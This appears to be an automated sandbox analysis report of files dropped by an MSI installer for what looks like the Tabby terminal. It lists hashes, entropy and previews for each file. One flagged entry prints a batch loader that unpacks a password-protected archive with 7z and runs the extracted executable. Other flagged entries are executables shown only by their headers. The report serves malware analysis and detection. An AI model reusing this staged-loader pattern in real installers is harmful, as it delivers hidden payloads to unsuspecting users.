                                                                                                                                                                                          Size (bytes):543232
                                                                                                                                                                                          Entropy (8bit):5.350780003321714
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:DD8qint0wME1/o/7Ng0Hkp3+UNoqFtnjO5Jmr40nIw6PZgHu:D4vthMsy7EpPoqTnjO5IrbnjO
                                                                                                                                                                                          MD5:1EFB37FAA54DA5A7D9FE694FEE7D5E4E
                                                                                                                                                                                          SHA1:497F6E0FB9DC099DFD8E107570FEBE9D0A6EBC2D
                                                                                                                                                                                          SHA-256:77AA01763C114B75A83DE3C34C60497B1CA23C98523F58A43C76AAE7380AB3B6
                                                                                                                                                                                          SHA-512:FACC41943159DAD7541F5D50B8216F6CCF02703A983DD81120F387DDEA70D502F5D66C275F80267C7A3B1EB9F1C751A4EC3B307D03F872BE4237366637BB829A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........b%..e.n...h.v...i.~...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.!...|.'...}.9.....A.....F.....N.....V.....^.....e.....l.....s.....t.....u.....w.............................]...........U.....p...........R.................>.................H...........+.....g.................=.....l.....|...........>.....f.....w...........q.................e.................<.................W.....h...........8.....t.................}.................u...........9.....^.................F.....\.................0.....?.................8.....N.................M.....`.................I.....U.................3.....>....................... .........................................R.....l...........".....N.....k.................C.....b...........I.....n.................v.................[.......................O.......................e................. ...........4.................7 ..... .....!....+!.....!....."....O"....c".....".....#.....#....A#.....#.....$....R$
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):493540
                                                                                                                                                                                          Entropy (8bit):5.454116761923621
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:+pQdZQe2AH5hJ1HNR5yyX+DuH/Fb0WmFosS4Eqsoh7Pwiw5dQH57jnMlvCKMvaKL:+yZ92ejyyIuJmFoszwQH57jUW
                                                                                                                                                                                          MD5:78A8A4956B1CD09124B448985A839F28
                                                                                                                                                                                          SHA1:A25BCAB44ED12DD0DD643AA6782903B22B84816B
                                                                                                                                                                                          SHA-256:AC1431E61F8C6C56EF96860DC8A8DDF840DBF6965AF6B920D811B7E39ADAB6B1
                                                                                                                                                                                          SHA-512:843BAFCE3E528BA98A3FF537B01D7896F83C22C0AD2E43BBCE83381FAA943D74D7B11B419DAAC0B0F57DE30D5792E3262DEFE9C68F5F4C7CA84B173395D14798
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........n%..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v. ...w.-...y.3...z.B...|.H...}.Z.....b.....g.....o.....w.......................................................................c...........Z.....u...........D.....t.................i...............................................}.......................l.......................k.........................................G.......................K.......................[...................................K.....b...........'.....I.....d.................0.....<.......................+.................3.....>.................?.....M.................7.....?.................2.....A.................4.....<...........$....._.....w...........%.....D.....Z.................<....._.................D.....Q.................M.....y.................6.....G.................3.....K.................O.....j...........e.................S.................>.................P.....].................. ....- ..... ..... ....)!
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):808052
                                                                                                                                                                                          Entropy (8bit):5.022679220176124
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:Jap2Eq8u313uyqoT+s7q+NRmX1loT4RmdAQifaQ2XxFMJGk620driUHMX9O9xdpW:sUjJ5SV
                                                                                                                                                                                          MD5:6C6C939CBCE5A9AE6B6A89B9DC1B14CD
                                                                                                                                                                                          SHA1:8674B02FB2A11BA6664427C78401D261DCEC859C
                                                                                                                                                                                          SHA-256:D77AADACDB5B72345C68590ECE6463EFCDD4E8817FE3DEDAD98D64F132B8E48F
                                                                                                                                                                                          SHA-512:3CF8ECCAC20108550C2A7758531AE992D72AA23396ABDFD38E613ED26FC755FA33385B4538DCE9E19309B622973CA6D4C0FEEEDC7064DF9BB12419DFC630D545
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.........%W.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.!...r.-...s.>...t.G...v.\...w.i...y.o...z.~...|.....}...............................................................................7.....^.....C.......................h.......................i.....).......................R.................k...........].....p...................................I.................r...........g...........%.................-...........l.......................O.......................|.......................#.....W.....{.............................Y.........../.....F...........~.................s...........S.....j...........v.................N.................@...........f.................f .....!....r!.....!.....".....".....".....".....#....4$....y$.....$....I%.....%....6&....V&.....'.....'.....'....A(.....(....7)....\)....w)....1*.....*....-+....O+.....+.....,.....,.....,.....-.........../...../....p0.....1....r1.....1....a2.....3....W3....z3.....3....|4.....4.....4....t5.....6....`6.....6
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):504052
                                                                                                                                                                                          Entropy (8bit):5.421469618205756
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:/aVXt4D7SmA19ub5KuOar5yZ7kfCHEpyWaM7OYM:/64D7Smll5yFHZl
                                                                                                                                                                                          MD5:83DEC7D70140F96E780BCA0E97EB3DFA
                                                                                                                                                                                          SHA1:E0C9891241D88716419F476BB193ADA5D8606EB1
                                                                                                                                                                                          SHA-256:AE902AB57A1325D4F0A0A1C69790F28F5E49B5671A99C4C315367B4425D1DE97
                                                                                                                                                                                          SHA-512:7B1851C2476290DBDE7DCBEFBE75F89041EC185DC4354DB55FFE2DA588E17363403921EEAF9FD26EBA8EB4DE3BF99876339DE1DD4219EC6F5E2EA3679B90BE71
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.........%f.e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.&...t./...v.D...w.Q...y.W...z.f...|.l...}.~...........................................................................................................h.....{...........A.....t.................d.........................................'.....}.......................N.....n.....~...........*.....P.....j...........M.......................[.......................].......................^.................&.......................O.......................).....u.......................I.....r.....~...........!.....K.....U.................4.....A.............................n.......................R.......................G.......................d.......................1.......................'.......................%......................./.....o.......................L.....v.................D.....}...................................k.......................{.......................V.............................u.......
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):569703
                                                                                                                                                                                          Entropy (8bit):5.1919702904490395
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:aZdptKHeHQogDYIQy7DQEuH2V8L0dnGNLmG5IXmr1YARQqK:odM5kxEG5mmg
                                                                                                                                                                                          MD5:E499AF17FCE1F7F276B3BFB0E1B2F5B2
                                                                                                                                                                                          SHA1:E2BF18ACF2A9E357AA7A694B5C60F947FD8BB0C2
                                                                                                                                                                                          SHA-256:A30015021FB928BCF16F9409FB45FB89CA3D196BAFB3597DF3FE4A9E477A3FD9
                                                                                                                                                                                          SHA-512:A1F03B7A6EC3F4601052D4E1F2CA6C092D9E5FE41CE7DF89F7E7FBE1A1892DF73A9CB85058F3C24E1236ED013E2BDD017F7BEC3D6B6FF13CA61BF0849C73F472
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.........%..e.L...h.T...i.j...j.v...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}.%.....-.....2.....:.....B.....J.....Q.....X....._.....`.....a.....f.....s.......................W...........F.....d...........[.................]...........J.....q...........f.................$.......................1.......................t...........%.....T...........j.................Y.................-.................T.....n...........i.................b...........N.....p.........../.....Z.....w...........%.....M.....Z.................8.....G...........$....._.....u...........A.....w.................I.....{.................J.....{.................L.....~...................................^.......................X.......................H.......................q...........*.....a...........(.....R.....l...........J.....}...........& ..... ..... ..... .....!....1"....."....."....@#.....#.....$....@$.....$.... %....V%....n%.....%....&&....N&....d&.....&....Z'.....'
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):587932
                                                                                                                                                                                          Entropy (8bit):5.385302506831163
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:3OjnZLqxMDpDgEL6QuaMVWXKz05FlZQmZyMYnYtzLl9ujzx4e5hxkJSW7v40wCJY:3Okm2VqN5Q7
                                                                                                                                                                                          MD5:606E583292DBEAE8A3742A700D09E1C2
                                                                                                                                                                                          SHA1:BF49B446173BA81EC3F926D69B87A81C5E233C4E
                                                                                                                                                                                          SHA-256:C22E274FBC4A033CB8A9A4E9A96F82487DC671EC0AD49B3257939D2A8A751442
                                                                                                                                                                                          SHA-512:47277EDBFB2DCE8724900C0A7B0231E34DEEE19B268F46C08D56ADECAD38D629D79466C26B701B6F43607F7DCDE55B1BBF6C3D73BDBD7E22096A0D14AD901621
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........F% .e.6...h.>...i.O...j.[...k.j...l.u...n.}...o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................'...../.....6.....=.....D.....E.....F.....H.....X.....f.....x...........,...........L.....n...........U.................=...........".....>.................m.................J.....v.................Z.................5...................................>.....b...........@.......................i...............................................#.......................d.......................^.......................d.......................|.................-.......................0.............................{.......................z.................A...........%.....<.................0.....N.......................$.................*.....F...........Q.................-.....|.................-.......................z...........,.....L...........J ..... ..... ....8!.....!.....!.....".....".....#....h#.....#.....#....0$....]$....q$.....$....]%.....%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1148544
                                                                                                                                                                                          Entropy (8bit):4.309990877698155
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:A4TQMBc+YPbBMDBW6bfrBDNOHIwjAwREJKVMjNiT7llj63rFXlPCpMi5eWWiMJsr:A4THSPbr6bvMa/+c5q4hNkFR
                                                                                                                                                                                          MD5:DBC465E12C921212C1A3E899E5FD5046
                                                                                                                                                                                          SHA1:F6F7081E622DF0FC9647DCE0572483899A59E440
                                                                                                                                                                                          SHA-256:7B06F3B7040901E7DBD2884BA534D43E73013CE0677BC725D53BCCD54759AD5E
                                                                                                                                                                                          SHA-512:9C3F3E7E7A62A0148789F561C37144F971ECC16C44A4F5A89214CBD7FADE0E1D2CCCD5C106C4718DF84A198262EF139A6530C400F5C0873231009E8B432BD3BC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:........T%..e.R...h.Z...i.t...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}./.....7.....<.....D.....L.....T.....[.....b.....i.....j.....k.....p.............................V.....S.....$.....`.....S.....................................................U.......................;.................f...........P.....p.....S...........n.......................J...........b.....6...................................+.....(.....#...............................................(.....d...........D...........9.....a...... ..... ..... .....!.....!....."....."...."#.....#.....$.....$.....%.....%....q&.....&.....&.....'....7(.....(.....(....^).....*....i*.....*.....+.....,....P-.....-....?...........F/....o/...../....t0.....0.....0....u1....V2.....2.....3.....4.....4....h5.....5.....6....-7....p7.....7.....8....K9.....9.....9.....:.....;....'<....Z<.....=.....>....|?.....?.....@.....A....0B.....B....pC....<D.....D.....D.....E....gF.....F.....F.....H.....H.....I
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):453011
                                                                                                                                                                                          Entropy (8bit):6.676159403780886
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:1K2A4c8ADmJUHGF2tuDasg5V5gjkzBMOZQyZV7zeXTA:8Z8Ahwasg5V5gjkzpr/7/
                                                                                                                                                                                          MD5:D6800784F1138702E4973CC5B074FE6C
                                                                                                                                                                                          SHA1:A8938CED7FE5A35163C28214EADD96A6F63A8666
                                                                                                                                                                                          SHA-256:D2C4AEC734BC94FBE7D60666343B4E419BE5E2CD1FF445A8BBF14FB4B8D3D715
                                                                                                                                                                                          SHA-512:3AD3557908E4BA71A5062AB0BE07832D553E6A3BD56BDD59A719DF65A4D9152950AF2DE25C6C410B6407463A862C92D49E9D0EE863BEF27A792AA128458FC7E7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.........$..e.....h.&...i.7...j.;...k.J...l.U...n.]...o.b...p.j...q.p...r.|...s.....t.....v.....w.....y.....z.....|.....}.............................................................'.....3.....B.....Q...........A.......................9.....b.....n.................`.....r...........".....O.....a.................2.....>.............................f.......................Z.......................R.......................:.......................).......................?.......................E.............................C.....c.....o.................1.....@.............................p.......................S.......................;.............................h.......................e.......................@.....Z.....n................. .............................t.......................].............................g.......................O.....~...................................G.......................Y.......................#.....d.....y.................0.....W.....i...........".
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):100
                                                                                                                                                                                          Entropy (8bit):4.593598756557746
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:mKDDFAR93Y+33BA5sLdFg3cITYCSHT225di8AE:hmR93Y+HBcjMIyieF
                                                                                                                                                                                          MD5:F5E7767D02BA2B58DCB57837E159D9A1
                                                                                                                                                                                          SHA1:7E94ACC3CFF992C94C07723DB1E5C6C1FE9C1B8F
                                                                                                                                                                                          SHA-256:2881E779833B832A966AE2F0D25DD0E8CAF20AFD1E524B0D489FED35690175A9
                                                                                                                                                                                          SHA-512:E0ED9CD697215E620AEBE6554F360F85356D6ACAC9356FD0170C4A95F2E6E00BC80C5440E80E26CF2D1F6CD2CE70B074DC72E3E7FF0D876947B191B2C474B1D3
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          Preview:@echo off..set "dd=%~1"...."%dd%\7z.exe" x "%dd%\jp_ver.dat" -o"%dd%" -y -p%2.."%dd%\mksSandbox.exe"
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4403320
                                                                                                                                                                                          Entropy (8bit):6.249719197874481
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:tQLMLy+5/ij+7ksNuCo7cMnTbpe/DGn/xUTHj8xUNDQePSiTivHn3Vv+ohiKGURZ:8A7kOTMnoGn//Y+vF+ohiKvReYBdFFX
                                                                                                                                                                                          MD5:32D4F18844BB58AD0EDED3931CB4022F
                                                                                                                                                                                          SHA1:5C15385CF2ED20AA345057D4B647ED2C0CB58CA8
                                                                                                                                                                                          SHA-256:24B08EDA5DA534A3389718241DB384B7BDFA3FDCD6AD126D03B436069E2AE845
                                                                                                                                                                                          SHA-512:086575C96B4580407175970AEE915961B323426CF1946D91852FF0141869DD6E8BA99FDB1846F4FD8382A2E1D15EC0E01DC5050CDDAA2B525EEEA3905D4A8866
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f..b5..b5..b5..c4..b5..f4..b5..c4..b5..5..b5..c4..b5..c5=.b5...5..b5..g4..b5..f4..b5..a4..b5..f4..b5..f4..b5..g4..b5...5..b5..`4..b5Rich..b5........PE..d......c..........".......,..x.......4,........@.............................`......e3C...`.................................................$`=.X.......(.............C.x(.......x..|.:.T.....................:.(....:.8.............,.@............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data....J....=..$....=.............@....pdata................@.............@..@.rsrc...(.............B.............@..@.reloc...x.......z....B.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):210
                                                                                                                                                                                          Entropy (8bit):5.084818975749688
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:oDSE8Uy2MTTxuNXbGtsQcNzVKR9/WQnUHt5n:CSEFWTENXEVcNu/lnUf
                                                                                                                                                                                          MD5:4A33CA4B60DCD4497A280F1065B8DABC
                                                                                                                                                                                          SHA1:62AC4A83E85E479D8D8EC162F727D763EC0C74AF
                                                                                                                                                                                          SHA-256:2F038A5A295DD7C97A395D1A963F5AE2C3EE12A2746CF69A5D78E2B4518072C3
                                                                                                                                                                                          SHA-512:0E98625BF04287A67720414ACC29223C8FC8A0EC08E050146CA1DFB1A8F926C38FBEFD956F5BF101071B09BDB1E097B7CEE57F258A550E1D9AC8D16171CB25AB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:provider: keygen.account: a06315f2-1031-47c6-9181-e92a20ec815e.channel: stable.product: f481b9d6-d5da-4970-b926-f515373e986f.platform: windows.updaterCacheDirName: tabby-updater.publisherName:. - syslink GmbH.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):128816
                                                                                                                                                                                          Entropy (8bit):6.77295089794811
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:m/bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWle6LeY7E:cPrwRhte1XsE1ll7E
                                                                                                                                                                                          MD5:31EC4BF51C97B56D1B47C34D8FE73309
                                                                                                                                                                                          SHA1:F63F1B04797A1B859D25F43574EFE45AB6FD5B49
                                                                                                                                                                                          SHA-256:F1C102ADE129D4D96591AAFADD4679A13BF1BDD9980206EC6B18357FD931B907
                                                                                                                                                                                          SHA-512:3232C06EBE260F6B23A08BB14C273DFFD591337380ADAA5EDD98A5E41386007793401AA3FF15FA199AFC5ED7A307D26A860C83BF32261252641189DF5FDEB744
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.................................. ....@....................................P.......x...............0S......T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):52528
                                                                                                                                                                                          Entropy (8bit):6.751675110373434
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:ui7+7A/h70Lp3sXaiXU9WBb1sYUG6EpYinAMxOYBGRCYigYBGF73iPmbLF:8pgKabVUG77HxVGRC7DGN79
                                                                                                                                                                                          MD5:D65D5A556D2A056B0E3D3A9959BC0D8C
                                                                                                                                                                                          SHA1:A8A45A2D49FC97CBC1ABA6BD30DE9DA5A30F0745
                                                                                                                                                                                          SHA-256:7B0F01CCA4914EEC757CBA4A0643A6491CA8F735AB6003D88EE598E26BF30FDF
                                                                                                                                                                                          SHA-512:22A36C7DD83BF4BC2814D8A7021759CAC01A33C126DBB4192C92DD98CF5C2974AB754DD11DA14E5230E60A3740D205F46A4D88D8B2043FE565C4C544F1CB5577
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r@..r@..r@...@..r@..sA..r@..wA..r@..vA..r@..qA..r@..sA..r@..s@.r@..{A..r@..@..r@..pA..r@Rich..r@................PE..d.....1b.........."......B...:.......C.........@.........................................`.................................................ty.......................z..0S......|....g..p............................g...............`..H............................text....A.......B.................. ..`.rdata..:'...`...(...F..............@..@.data................n..............@....pdata...............r..............@..@.rsrc................v..............@..@.reloc..|............x..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):796
                                                                                                                                                                                          Entropy (8bit):5.091066359784689
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:TMHd4+tJVEdQsv9SvS2e1XDMCnBiYlkCmak0nWMtn7g4QGCkaQAHn6nEtZL7egw:2d6ysv3r1RBi1ak0nx7HQQaqsvRw
                                                                                                                                                                                          MD5:E43AFFCF9D485CD8E137E9FBF1566F6A
                                                                                                                                                                                          SHA1:DB7BDB358D2E5A27AB13304860F96E3545C253A8
                                                                                                                                                                                          SHA-256:D2D2FBDE613F8BB5790A42682B228D18D0D19CF9731D7F9F1FE98FF5BF4AE704
                                                                                                                                                                                          SHA-512:0658C786DC969B9C216FFC4A636160CC3D4AB6EA21FD75A3235C0FB93C0EF8C820C2E522E936AA602F39387D45518066DB25D8EFBC417F58C7836F36816E5E37
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">..<plist version="1.0">..<dict>...<key>NSServices</key>...<array>....<dict>.....<key>NSBackgroundColorName</key>.....<string>background</string>.....<key>NSIconName</key>.....<string>NSActionTemplate</string>.....<key>NSMenuItem</key>.....<dict>......<key>default</key>......<string>Open Tabby here</string>.....</dict>.....<key>NSMessage</key>.....<string>runWorkflowAsService</string>.....<key>NSRequiredContext</key>.....<dict>......<key>NSApplicationIdentifier</key>......<string>com.apple.finder</string>.....</dict>.....<key>NSSendFileTypes</key>.....<array>......<string>public.item</string>.....</array>....</dict>...</array>..</dict>..</plist>..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3730
                                                                                                                                                                                          Entropy (8bit):7.935179648465286
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:3uYzgziKENNlTOLOcmbUVRImS7JCUP3YMGYvoAzap:3uqKKtVbcWmS7lP38YRM
                                                                                                                                                                                          MD5:230BEC0E3D1F23A98ABFF47A25880762
                                                                                                                                                                                          SHA1:B6FD10B60A3CCD9F7EB103D00CD74A2479BB8DE4
                                                                                                                                                                                          SHA-256:F2795F9C16E439171A9BD704F382AEC4CF4B81FEA1614D237A17A95FCB123435
                                                                                                                                                                                          SHA-512:FFFAD79EDDF1198BFD43AB334EB2CF07E8C4612D1F8DFADDF5563129D381C17D4C58D8586FC3628163DEA5B3B91B4E9DE8F912CC23A0213D9C1E00E7F6166DBD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.PNG........IHDR.............r.....FiCCPICC Profile..H..W.TS...[RIh..H......Z........J..A.,*.v....*..Z.Y+..(..P...u.`C.M...y...3w.......;..N.O*.Cu....."CYc..Y.G..H.....K...1..@.Oy{. .........*z.......q.@..x?.x._*+......S..J<.b....b..g.q..g.q..&)...N..4.O...v3....G.....X..... ..'.8..a.........ox....9...e.bu.*!....<.....[....>.`..dQ..a.n.N.Vb.....8..!~/...!F."ET...5..9.f.........).......>3K.......H\.M..](..'j8kd....p.....m..T~..'...l..-..;...X........Sb!..).M.V.`6."N.L.....b..$2T.M.E$h.e..|.."17V...DIQ...|.*~#....v...P>6f ..0,\.;vY(I..uH.B.4s_I..5.8U....[Al*/L......T....$u.xf.oT.:........,..-.L.9@.......G"...@6....f`F.jD............F....?.j.O....-T...O ... ..V.fI....?.F..w>.5.6..:6..h4..^..%1..F."F..q.<...c.3.6w.......=......p..A.=I<O.]>,0.t@....3......^x(...!7..M....=..`...j9.............JA)C(!...gj;i{..(k.m..f..38...7...>.{Kl!..;....a..&..b..E.....?T.h.[.*.\.#...O.SYI.k.k..'.X..H.?..d.4.8[T.b._..J....]........L...a....o.@....C_u...w...:.N.....
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 162 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                          Entropy (8bit):5.459232647646292
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:99/lf/8llLxs/e0l9kbXbP6baYtU4VRwBFbTBn:+llxs/e08bXz6by4HwBFbTBn
                                                                                                                                                                                          MD5:906FCCB4C457F96F5F773CED6B743270
                                                                                                                                                                                          SHA1:1CE2B5D56352C00611F88120F1C2D5E97E345A2E
                                                                                                                                                                                          SHA-256:5B9CD21B3778C6A9E17F9DECBC986923CE4BA15B6EAF8746BD5FEA5BE3099AC8
                                                                                                                                                                                          SHA-512:221F2C3FCAC246E27CBEF5D22FD8CBEB5B3EF94F9B46316CA5843703172C0D87DFC02D731256E4F87841DE1524F6B8C72C537E070FEFDB08EC5EBDD387244582
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4...........................GOpen Terminus here.V4JSMC46SY.....;.].<..=..}L.m>..i.3..Hz:.6j..{K......=9..N.p}....x#..b...=9..N.p}....x#..b.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Requirement Set - 180 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):180
                                                                                                                                                                                          Entropy (8bit):3.5492555581720207
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:+ZEulB9FWRlFaVA3Wl/lljYNuPRuMFxuu//ul/Ll/Uk5b/:+ZEuDWD4VAm13ove/q/Ll/v5b/
                                                                                                                                                                                          MD5:D1381896FD6ABAEE339F7099BF972FAD
                                                                                                                                                                                          SHA1:EC69DD33C0FD487A3AB1366AB3A27B4BFA1CA4B1
                                                                                                                                                                                          SHA-256:4229959813B441C9037FE7457CA7FB722EB4AEDC5D69D55911E3F4753B297335
                                                                                                                                                                                          SHA-512:7B806CB538390AB62A7CF3AF6E4BC76C5445327E97F6CFF0CAD6F90B4114E5524D4A8954A554A15BBC4C4913C9BDA1B01B9E0E3B6D2E0ABF54EE74EBA0618FB0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:............................................Open Terminus here..........................*.H..cd.........................*.H..cd.....................subject.OU..........V4JSMC46SY..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Mac OS X Code Directory version 20200 - 210 bytes
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):210
                                                                                                                                                                                          Entropy (8bit):5.906846162722358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:9N/lD/8llLFltlm0l9kbe3iErfPhSj2vwcCYDZ9mBbhXDVZWMBbhXDVZn:yllFA08bXaIjFcCYl929zvWA9zvn
                                                                                                                                                                                          MD5:B02F322820A14092104F00C754F3CFB1
                                                                                                                                                                                          SHA1:690B15ED915483C40068FFECB0F7E27276B6F10A
                                                                                                                                                                                          SHA-256:79736C312EEEFCD43AA55135348EC052F39039CFD0742B22D7BD4422210876E4
                                                                                                                                                                                          SHA-512:16968523918A9357A29E1A627D6707694C309FD5ACA421779FF5EE7983FABC588F52E7002506E5218FCBB0575A58268E6327560DC422D98C3A0C83FFEA192C0C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.......................4............ ..............GOpen Terminus here.V4JSMC46SY./.?.~.*....9?....)..t..D.L...B)....A....E|..r....]i.Y...u;)s5.6..vK.r.N....'......-E..5.fl...6..vK.r.N....'......-E..5.fl..
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2949
                                                                                                                                                                                          Entropy (8bit):5.068788614562225
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:c6ys/eV51a2mFOyvQ75tCejztiOUH7m1yvQ7pfS1:9ysQ0Qzz7+
                                                                                                                                                                                          MD5:4BA3A4738791004CEC877840B28C9437
                                                                                                                                                                                          SHA1:A5B9CF6BB738A321EED2182D83F4F1BAE7B8BAAA
                                                                                                                                                                                          SHA-256:1EB4B1B391B1AFF36CD19F45BDA0C3515BE38D182DD5ED68D61B2AFE7E33F208
                                                                                                                                                                                          SHA-512:8EEA7079152B074312152829659489E9EC7F16292794ED990F65EEF978DBF39CEAC978DECF5BAED34681B3D43ED7C44BE4D4A0D5FA29C803FAD92091B997E91D
                                                                                                                                                                                          Malicious:false
